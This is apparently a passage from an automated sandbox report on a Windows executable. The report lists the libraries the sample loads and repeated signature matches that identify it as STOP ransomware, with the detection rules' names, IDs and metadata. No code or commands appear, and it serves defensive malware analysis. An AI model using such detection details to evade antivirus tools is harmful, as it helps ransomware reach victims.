              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: browcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: schannel.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mskeyprotect.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncryptsslp.dll
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000000.1661461662.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000000.1623898320.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000000.1641298642.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000000.1771858243.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
